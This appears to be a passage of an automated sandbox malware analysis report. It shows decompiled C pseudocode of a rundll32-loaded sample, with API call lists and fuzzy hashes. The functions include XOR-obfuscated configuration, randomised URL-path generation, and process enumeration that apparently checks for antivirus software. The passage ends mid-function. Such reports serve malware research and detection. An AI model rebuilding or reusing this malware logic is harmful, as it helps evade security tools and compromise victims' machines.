                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                  • String ID:
                                                  • API String ID: 2394032930-0
                                                  • Opcode ID: 05fb485a78d75f869a195726d770625b7c3f989e94086358ba7fb504d257966a
                                                  • Instruction ID: 6aa41f1cefe55068ebcf4dc41e71c94fd5b9b4cc4398611f85f3e23b2a8b3052
                                                  • Opcode Fuzzy Hash: 05fb485a78d75f869a195726d770625b7c3f989e94086358ba7fb504d257966a
                                                  • Instruction Fuzzy Hash: 7431B13AB80204ABDB21DFA4DC44A6E7BB9EFC4264F100568E915E71D0EF30F946CB12
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SysAllocString.OLEAUT32(80000002), ref: 04F43B46
                                                  • SysAllocString.OLEAUT32(04F41885), ref: 04F43B89
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04F43B9D
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04F43BAB
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: 734a622780ed0e5d91aec4c9eb6d43fceaf2acad3f7d92d1296e1e1dfdcd3ea8
                                                  • Instruction ID: 96dac214cfa988d4bfb6d641436073c6680bb7ee4284e29e9c6a845e84287fbe
                                                  • Opcode Fuzzy Hash: 734a622780ed0e5d91aec4c9eb6d43fceaf2acad3f7d92d1296e1e1dfdcd3ea8
                                                  • Instruction Fuzzy Hash: D131F075A00109EFCB05DF98D4C49AE7FB5FF98340B10846DF91AA7210DB75AA46CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E04F442EA(signed int _a4, signed int* _a8) {
                                                  				void* __ecx;
                                                  				void* __edi;
                                                  				signed int _t6;
                                                  				intOrPtr _t8;
                                                  				intOrPtr _t12;
                                                  				short* _t19;
                                                  				void* _t25;
                                                  				void* _t26;
                                                  				signed int* _t28;
                                                  				CHAR* _t30;
                                                  				long _t31;
                                                  				intOrPtr* _t32;
                                                  
                                                  				_t6 =  *0x4f4d270; // 0xd448b889
                                                  				_t32 = _a4;
                                                  				_a4 = _t6 ^ 0x109a6410;
                                                  				_t8 =  *0x4f4d27c; // 0x212a5a8
                                                  				_t3 = _t8 + 0x4f4e862; // 0x61636f4c
                                                  				_t25 = 0;
                                                  				_t30 = E04F47A9A(_t3, 1);
                                                  				if(_t30 != 0) {
                                                  					_t25 = CreateEventA(0x4f4d2a8, 1, 0, _t30);
                                                  					E04F49039(_t30);
                                                  				}
                                                  				_t12 =  *0x4f4d25c; // 0x4000000a
                                                  				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04F4757F() != 0) {
                                                  					L12:
                                                  					_t28 = _a8;
                                                  					if(_t28 != 0) {
                                                  						 *_t28 =  *_t28 | 0x00000001;
                                                  					}
                                                  					_t31 = E04F4205E(_t32, _t26);
                                                  					if(_t31 == 0 && _t25 != 0) {
                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                  					}
                                                  					if(_t28 != 0 && _t31 != 0) {
                                                  						 *_t28 =  *_t28 & 0xfffffffe;
                                                  					}
                                                  					goto L20;
                                                  				} else {
                                                  					_t19 =  *0x4f4d0f0( *_t32, 0x20);
                                                  					if(_t19 != 0) {
                                                  						 *_t19 = 0;
                                                  						_t19 = _t19 + 2;
                                                  					}
                                                  					_t31 = E04F4A501(0,  *_t32, _t19, 0);
                                                  					if(_t31 == 0) {
                                                  						if(_t25 == 0) {
                                                  							L22:
                                                  							return _t31;
                                                  						}
                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                  						if(_t31 == 0) {
                                                  							L20:
                                                  							if(_t25 != 0) {
                                                  								CloseHandle(_t25);
                                                  							}
                                                  							goto L22;
                                                  						}
                                                  					}
                                                  					goto L12;
                                                  				}
                                                  			}

                                                  APIs
                                                    • Part of subcall function 04F47A9A: lstrlen.KERNEL32(04F423E9,00000000,00000000,00000027,00000005,00000000,00000000,04F496DA,74666F53,00000000,04F423E9,04F4D00C,?,04F423E9), ref: 04F47AD0
                                                    • Part of subcall function 04F47A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 04F47AF4
                                                    • Part of subcall function 04F47A9A: lstrcat.KERNEL32(00000000,00000000), ref: 04F47AFC
                                                  • CreateEventA.KERNEL32(04F4D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04F43CA0,?,00000001,?), ref: 04F4432B
                                                    • Part of subcall function 04F49039: HeapFree.KERNEL32(00000000,00000000,04F47F18,00000000,?,?,00000000), ref: 04F49045
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,04F43CA0,00000000,00000000,?,00000000,?,04F43CA0,?,00000001,?,?,?,?,04F46880), ref: 04F44389
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04F43CA0,?,00000001,?), ref: 04F443B7
                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04F43CA0,?,00000001,?,?,?,?,04F46880), ref: 04F443CF
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 73268831-0
                                                  • Opcode ID: 2ed7969dcea189fb6c34b38679274b6cffe832b3517dcf4e9ebce4721ed23326
                                                  • Instruction ID: 1a661693f4a42194b173501c5c75c967f92941dd76ad15b66241fb744911f67d
                                                  • Opcode Fuzzy Hash: 2ed7969dcea189fb6c34b38679274b6cffe832b3517dcf4e9ebce4721ed23326
                                                  • Instruction Fuzzy Hash: A721E472A012559BE731AEA8AC44B7B7FE9EBC8F10F050615F955FB140DF61EC039690
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 38%
                                                  			E04F4A0B2(void* __ecx, void* __esi) {
                                                  				char _v8;
                                                  				long _v12;
                                                  				char _v16;
                                                  				long _v20;
                                                  				long _t34;
                                                  				long _t39;
                                                  				long _t42;
                                                  				long _t56;
                                                  				intOrPtr _t58;
                                                  				void* _t59;
                                                  				intOrPtr* _t60;
                                                  				void* _t61;
                                                  
                                                  				_t61 = __esi;
                                                  				_t59 = __ecx;
                                                  				_t60 =  *0x4f4d144; // 0x4f4ad81
                                                  				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                  				do {
                                                  					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                  					_v20 = _t34;
                                                  					if(_t34 != 0) {
                                                  						L3:
                                                  						_push( &_v16);
                                                  						_push( &_v8);
                                                  						_push(_t61 + 0x2c);
                                                  						_push(0x20000013);
                                                  						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                  						_v8 = 4;
                                                  						_v16 = 0;
                                                  						if( *_t60() == 0) {
                                                  							_t39 = GetLastError();
                                                  							_v12 = _t39;
                                                  							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                  								L15:
                                                  								return _v12;
                                                  							} else {
                                                  								goto L11;
                                                  							}
                                                  						}
                                                  						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                  							goto L11;
                                                  						} else {
                                                  							_v16 = 0;
                                                  							_v8 = 0;
                                                  							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                  							_t58 = E04F42049(_v8 + 1);
                                                  							if(_t58 == 0) {
                                                  								_v12 = 8;
                                                  							} else {
                                                  								_push( &_v16);
                                                  								_push( &_v8);
                                                  								_push(_t58);
                                                  								_push(0x16);
                                                  								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                  								if( *_t60() == 0) {
                                                  									E04F49039(_t58);
                                                  									_v12 = GetLastError();
                                                  								} else {
                                                  									 *((char*)(_t58 + _v8)) = 0;
                                                  									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                  								}
                                                  							}
                                                  							goto L15;
                                                  						}
                                                  					}
                                                  					SetEvent( *(_t61 + 0x1c));
                                                  					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                  					_v12 = _t56;
                                                  					if(_t56 != 0) {
                                                  						goto L15;
                                                  					}
                                                  					goto L3;
                                                  					L11:
                                                  					_t42 = E04F41C47( *(_t61 + 0x1c), _t59, 0xea60);
                                                  					_v12 = _t42;
                                                  				} while (_t42 == 0);
                                                  				goto L15;
                                                  			}
                                                  0x04f4a0b2
                                                  0x04f4a0b2
                                                  0x04f4a0bc
                                                  0x04f4a0c2
                                                  0x04f4a0c5
                                                  0x04f4a0c9
                                                  0x04f4a0d1
                                                  0x04f4a0d4
                                                  0x04f4a0ed
                                                  0x04f4a0f0
                                                  0x04f4a0f4
                                                  0x04f4a0f8
                                                  0x04f4a0f9
                                                  0x04f4a0fe
                                                  0x04f4a101
                                                  0x04f4a108
                                                  0x04f4a10f
                                                  0x04f4a162
                                                  0x04f4a16b
                                                  0x04f4a16e
                                                  0x04f4a1a9
                                                  0x04f4a1af
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04f4a16e
                                                  0x04f4a115
                                                  0x00000000
                                                  0x04f4a11c
                                                  0x04f4a12a
                                                  0x04f4a12d
                                                  0x04f4a130
                                                  0x04f4a13c
                                                  0x04f4a140
                                                  0x04f4a1a2
                                                  0x04f4a142
                                                  0x04f4a145
                                                  0x04f4a149
                                                  0x04f4a14a
                                                  0x04f4a14b
                                                  0x04f4a14d
                                                  0x04f4a154
                                                  0x04f4a192
                                                  0x04f4a19d
                                                  0x04f4a156
                                                  0x04f4a159
                                                  0x04f4a15d
                                                  0x04f4a15d
                                                  0x04f4a154
                                                  0x00000000
                                                  0x04f4a140
                                                  0x04f4a115
                                                  0x04f4a0d9
                                                  0x04f4a0df
                                                  0x04f4a0e4
                                                  0x04f4a0e7
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04f4a177
                                                  0x04f4a17f
                                                  0x04f4a186
                                                  0x04f4a186
                                                  0x00000000

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 04F4A0C9
                                                  • SetEvent.KERNEL32(?), ref: 04F4A0D9
                                                  • GetLastError.KERNEL32 ref: 04F4A162
                                                    • Part of subcall function 04F41C47: WaitForMultipleObjects.KERNEL32(00000002,04F4AA72,00000000,04F4AA72,?,?,?,04F4AA72,0000EA60), ref: 04F41C62
                                                    • Part of subcall function 04F49039: HeapFree.KERNEL32(00000000,00000000,04F47F18,00000000,?,?,00000000), ref: 04F49045
                                                  • GetLastError.KERNEL32(00000000), ref: 04F4A197
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
• Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
• Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                  • String ID:
                                                  • API String ID: 602384898-0
                                                  • Opcode ID: 2eea41d9fa3deba216a3be1a395133157018a61a9b08b53659821a5d07f44f1f
                                                  • Instruction ID: 467ace4b8319e01d53d0020857ef4d0598c5b4b57c6a580fc746c4fe5a20d7db
                                                  • Opcode Fuzzy Hash: 2eea41d9fa3deba216a3be1a395133157018a61a9b08b53659821a5d07f44f1f
                                                  • Instruction Fuzzy Hash: B9312EB5D40308EFEB20DFE5DC8099EBBB8EF84344F10496AE502E2150DB70AA86DF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 40%
                                                  			E04F43BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                  				intOrPtr _v12;
                                                  				void* _v16;
                                                  				void* _v28;
                                                  				char _v32;
                                                  				void* __esi;
                                                  				void* _t29;
                                                  				void* _t38;
                                                  				signed int* _t39;
                                                  				void* _t40;
                                                  
                                                  				_t36 = __ecx;
                                                  				_v32 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_v12 = _a4;
                                                  				_t38 = E04F49763(__ecx,  &_v32);
                                                  				if(_t38 != 0) {
                                                  					L12:
                                                  					_t39 = _a8;
                                                  					L13:
                                                  					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                  						_t16 =  &(_t39[1]); // 0x5
                                                  						_t23 = _t16;
                                                  						if( *_t16 != 0) {
                                                  							E04F4A022(_t23);
                                                  						}
                                                  					}
                                                  					return _t38;
                                                  				}
                                                  				if(E04F4A72D(0x40,  &_v16) != 0) {
                                                  					_v16 = 0;
                                                  				}
                                                  				_t40 = CreateEventA(0x4f4d2a8, 1, 0,  *0x4f4d344);
                                                  				if(_t40 != 0) {
                                                  					SetEvent(_t40);
                                                  					Sleep(0xbb8);
                                                  					CloseHandle(_t40);
                                                  				}
                                                  				_push( &_v32);
                                                  				if(_a12 == 0) {
                                                  					_t29 = E04F48A51(_t36);
                                                  				} else {
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_t29 = E04F417D5(_t36);
                                                  				}
                                                  				_t41 = _v16;
                                                  				_t38 = _t29;
                                                  				if(_v16 != 0) {
                                                  					E04F41F99(_t41);
                                                  				}
                                                  				if(_t38 != 0) {
                                                  					goto L12;
                                                  				} else {
                                                  					_t39 = _a8;
                                                  					_t38 = E04F442EA( &_v32, _t39);
                                                  					goto L13;
                                                  				}
                                                  			}
                                                  0x04f43bf1
                                                  0x04f43bfe
                                                  0x04f43c04
                                                  0x04f43c05
                                                  0x04f43c06
                                                  0x04f43c07
                                                  0x04f43c08
                                                  0x04f43c0c
                                                  0x04f43c18
                                                  0x04f43c1c
                                                  0x04f43ca4
                                                  0x04f43ca4
                                                  0x04f43ca7
                                                  0x04f43ca9
                                                  0x04f43cb1
                                                  0x04f43cb1
                                                  0x04f43cb7
                                                  0x04f43cba
                                                  0x04f43cba
                                                  0x04f43cb7
                                                  0x04f43cc5
                                                  0x04f43cc5
                                                  0x04f43c2f
                                                  0x04f43c31
                                                  0x04f43c31
                                                  0x04f43c48
                                                  0x04f43c4c
                                                  0x04f43c4f
                                                  0x04f43c5a
                                                  0x04f43c61
                                                  0x04f43c61
                                                  0x04f43c6d
                                                  0x04f43c6e
                                                  0x04f43c7c
                                                  0x04f43c70
                                                  0x04f43c70
                                                  0x04f43c71
                                                  0x04f43c72
                                                  0x04f43c73
                                                  0x04f43c74
                                                  0x04f43c75
                                                  0x04f43c75
                                                  0x04f43c81
                                                  0x04f43c86
                                                  0x04f43c88
                                                  0x04f43c8a
                                                  0x04f43c8a
                                                  0x04f43c91
                                                  0x00000000
                                                  0x04f43c93
                                                  0x04f43c93
                                                  0x04f43ca0
                                                  0x00000000
                                                  0x04f43ca0

                                                  APIs
                                                  • CreateEventA.KERNEL32(04F4D2A8,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,04F46880,?,00000001,?), ref: 04F43C42
                                                  • SetEvent.KERNEL32(00000000,?,?,?,04F46880,?,00000001,?,00000002,?,?,04F42417,?), ref: 04F43C4F
                                                  • Sleep.KERNEL32(00000BB8,?,?,?,04F46880,?,00000001,?,00000002,?,?,04F42417,?), ref: 04F43C5A
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,04F46880,?,00000001,?,00000002,?,?,04F42417,?), ref: 04F43C61
                                                    • Part of subcall function 04F48A51: WaitForSingleObject.KERNEL32(00000000,?,?,?,04F43C81,?,04F43C81,?,?,?,?,?,04F43C81,?), ref: 04F48B2B
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
• Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
• Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                  • String ID:
                                                  • API String ID: 2559942907-0
                                                  • Opcode ID: 19dc27669e5520a405c5ca3ecf51e0a11c30f470fc682fe368780c6962ef95ab
                                                  • Instruction ID: 7d4e646e4b6813372452ad1f936046061d35d398989eb0c0c2482477044b05bb
                                                  • Opcode Fuzzy Hash: 19dc27669e5520a405c5ca3ecf51e0a11c30f470fc682fe368780c6962ef95ab
                                                  • Instruction Fuzzy Hash: 8B217476E00219ABDB10BFE898849AEBBA9EBC4354B014425EA11E7100DF74FD578BA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E04F41A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                  				intOrPtr _v8;
                                                  				void* _v12;
                                                  				void* _v16;
                                                  				intOrPtr _t26;
                                                  				intOrPtr* _t28;
                                                  				intOrPtr _t31;
                                                  				intOrPtr* _t32;
                                                  				void* _t39;
                                                  				int _t46;
                                                  				intOrPtr* _t47;
                                                  				int _t48;
                                                  
                                                  				_t47 = __eax;
                                                  				_push( &_v12);
                                                  				_push(__eax);
                                                  				_t39 = 0;
                                                  				_t46 = 0;
                                                  				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                  				_v8 = _t26;
                                                  				if(_t26 < 0) {
                                                  					L13:
                                                  					return _v8;
                                                  				}
                                                  				if(_v12 == 0) {
                                                  					Sleep(0xc8);
                                                  					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                  				}
                                                  				if(_v8 >= _t39) {
                                                  					_t28 = _v12;
                                                  					if(_t28 != 0) {
                                                  						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                  						_v8 = _t31;
                                                  						if(_t31 >= 0) {
                                                  							_t46 = lstrlenW(_v16);
                                                  							if(_t46 != 0) {
                                                  								_t46 = _t46 + 1;
                                                  								_t48 = _t46 + _t46;
                                                  								_t39 = E04F42049(_t48);
                                                  								if(_t39 == 0) {
                                                  									_v8 = 0x8007000e;
                                                  								} else {
                                                  									memcpy(_t39, _v16, _t48);
                                                  								}
                                                  								__imp__#6(_v16);
                                                  							}
                                                  						}
                                                  						_t32 = _v12;
                                                  						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                  					}
                                                  					 *_a4 = _t39;
                                                  					 *_a8 = _t46 + _t46;
                                                  				}
                                                  				goto L13;
                                                  			}
                                                  0x04f41a7c
                                                  0x04f41a80
                                                  0x04f41a81
                                                  0x04f41a82
                                                  0x04f41a84
                                                  0x04f41a86
                                                  0x04f41a8b
                                                  0x04f41a8e
                                                  0x04f41b25
                                                  0x04f41b2c
                                                  0x04f41b2c
                                                  0x04f41a97
                                                  0x04f41a9e
                                                  0x04f41aae
                                                  0x04f41aae
                                                  0x04f41ab4
                                                  0x04f41ab6
                                                  0x04f41abb
                                                  0x04f41ac4
                                                  0x04f41acc
                                                  0x04f41acf
                                                  0x04f41ada
                                                  0x04f41ade
                                                  0x04f41ae0
                                                  0x04f41ae1
                                                  0x04f41aea
                                                  0x04f41aee
                                                  0x04f41aff
                                                  0x04f41af0
                                                  0x04f41af5
                                                  0x04f41afa
                                                  0x04f41b09
                                                  0x04f41b09
                                                  0x04f41ade
                                                  0x04f41b0f
                                                  0x04f41b15
                                                  0x04f41b15
                                                  0x04f41b1e
                                                  0x04f41b23
                                                  0x04f41b23
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
• Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
• Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1198164300-0
                                                  • Opcode ID: e4d9faa3807831347e13df920047403d40d22439ec4cc7fd9321ad28d0487619
                                                  • Instruction ID: 773cab331f535b1e4c0ac203cc88852945437a2079389e1c3afde48f5e6367ec
                                                  • Opcode Fuzzy Hash: e4d9faa3807831347e13df920047403d40d22439ec4cc7fd9321ad28d0487619
                                                  • Instruction Fuzzy Hash: 7B217475A01209EFDB10DFA8D9889DEBFB5FF89305B148169E905E7210EB34EA45CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E04F4788B(unsigned int __eax, void* __ecx) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				signed int _t21;
                                                  				signed short _t23;
                                                  				char* _t27;
                                                  				void* _t29;
                                                  				void* _t30;
                                                  				unsigned int _t33;
                                                  				void* _t37;
                                                  				unsigned int _t38;
                                                  				void* _t41;
                                                  				void* _t42;
                                                  				int _t45;
                                                  				void* _t46;
                                                  
                                                  				_t42 = __eax;
                                                  				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                  				_t38 = __eax;
                                                  				_t30 = RtlAllocateHeap( *0x4f4d238, 0, (__eax >> 3) + __eax + 1);
                                                  				_v12 = _t30;
                                                  				if(_t30 != 0) {
                                                  					_v8 = _t42;
                                                  					do {
                                                  						_t33 = 0x18;
                                                  						if(_t38 <= _t33) {
                                                  							_t33 = _t38;
                                                  						}
                                                  						_t21 =  *0x4f4d250; // 0x0
                                                  						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                  						 *0x4f4d250 = _t23;
                                                  						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                  						memcpy(_t30, _v8, _t45);
                                                  						_v8 = _v8 + _t45;
                                                  						_t27 = _t30 + _t45;
                                                  						_t38 = _t38 - _t45;
                                                  						_t46 = _t46 + 0xc;
                                                  						 *_t27 = 0x2f;
                                                  						_t13 = _t27 + 1; // 0x1
                                                  						_t30 = _t13;
                                                  					} while (_t38 > 8);
                                                  					memcpy(_t30, _v8, _t38 + 1);
                                                  				}
                                                  				return _v12;
                                                  			}

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F4839A,00000000,?,?,04F4A428,?,070795B0), ref: 04F47896
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F478AE
                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04F4839A,00000000,?,?,04F4A428,?,070795B0), ref: 04F478F2
                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 04F47913
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                  • String ID:
                                                  • API String ID: 1819133394-0
                                                  • Opcode ID: f0ea7d507fc276b32197ce6072fd9544a6342e1113f125e6333ce9f9bc9ccb3b
                                                  • Instruction ID: 4ee4d1f6e5b24f1b338006636db1dd8f2ea837e63a92ebad9e9f094c873a7d71
                                                  • Opcode Fuzzy Hash: f0ea7d507fc276b32197ce6072fd9544a6342e1113f125e6333ce9f9bc9ccb3b
                                                  • Instruction Fuzzy Hash: C711C676A00118AFE7109E69EC84E9EBFEAEBD5260B150166F505DB140EF74AE05C7A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 53%
                                                  			E04F47A9A(intOrPtr _a4, intOrPtr _a8) {
                                                  				char _v20;
                                                  				void* _t8;
                                                  				void* _t13;
                                                  				void* _t16;
                                                  				char* _t18;
                                                  				void* _t19;
                                                  
                                                  				_t19 = 0x27;
                                                  				_t1 =  &_v20; // 0x74666f53
                                                  				_t18 = 0;
                                                  				E04F46B43(_t8, _t1);
                                                  				_t16 = E04F42049(_t19);
                                                  				if(_t16 != 0) {
                                                  					_t3 =  &_v20; // 0x74666f53
                                                  					_t13 = E04F486D8(_t3, _t16, _a8);
                                                  					if(_a4 != 0) {
                                                  						__imp__(_a4);
                                                  						_t19 = _t13 + 0x27;
                                                  					}
                                                  					_t18 = E04F42049(_t19);
                                                  					if(_t18 != 0) {
                                                  						 *_t18 = 0;
                                                  						if(_a4 != 0) {
                                                  							__imp__(_t18, _a4);
                                                  						}
                                                  						__imp__(_t18, _t16);
                                                  					}
                                                  					E04F49039(_t16);
                                                  				}
                                                  				return _t18;
                                                  			}










                                                  APIs
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                    • Part of subcall function 04F486D8: wsprintfA.USER32 ref: 04F48734
                                                  • lstrlen.KERNEL32(04F423E9,00000000,00000000,00000027,00000005,00000000,00000000,04F496DA,74666F53,00000000,04F423E9,04F4D00C,?,04F423E9), ref: 04F47AD0
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 04F47AF4
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 04F47AFC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                  • String ID: Soft
                                                  • API String ID: 393707159-3753413193
                                                  • Opcode ID: 42a64adee12229c25108d32e2dae14eb262516dc7fb7c05ef7a7bd8da5421963
                                                  • Instruction ID: 30004284156914d9751af847808206befd9ae4008f0ccd7361754cd0d7a6a8cc
                                                  • Opcode Fuzzy Hash: 42a64adee12229c25108d32e2dae14eb262516dc7fb7c05ef7a7bd8da5421963
                                                  • Instruction Fuzzy Hash: 5601F236100249A7D712BAA9AC84EEF3FA8EFC0289F054021F50595100EF79AA47C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E04F4757F() {
                                                  				char _v264;
                                                  				void* _v300;
                                                  				int _t8;
                                                  				intOrPtr _t9;
                                                  				int _t15;
                                                  				void* _t17;
                                                  
                                                  				_t15 = 0;
                                                  				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                  				if(_t17 != 0) {
                                                  					_t8 = Process32First(_t17,  &_v300);
                                                  					while(_t8 != 0) {
                                                  						_t9 =  *0x4f4d27c; // 0x212a5a8
                                                  						_t2 = _t9 + 0x4f4ee54; // 0x73617661
                                                  						_push( &_v264);
                                                  						if( *0x4f4d0fc() != 0) {
                                                  							_t15 = 1;
